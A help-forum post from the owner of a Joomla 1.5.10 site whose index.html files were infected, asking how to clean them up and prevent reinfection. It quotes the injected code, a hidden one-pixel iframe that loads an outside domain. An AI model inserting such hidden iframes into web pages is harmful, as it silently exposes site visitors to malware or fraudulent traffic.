In Joomla1.5.10 all my index.html files are affected with malware

    Hi,
    My site is www.birdinginargentina.com developed in Joomla1.5.10. In my site all the index.html files are affected with malware. Now these files hold following code like
    
<html><body bgcolor="#FFFFFF"></body></html><iframe src="http://neglite.com/?click=1AACD5A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    Code (markup):
    Now I am doing following procedure to get rid of malware
    1. downloading all index.html files,
    2. removing malware code[iframe],
    3. uploading only <html>…</html> code in that folder and
    4. doing permission 644 manually.
    It is very tough.
    If I delete all the index.html files manually from whole site, site will run properly? Is there any possibility infection in future or not?
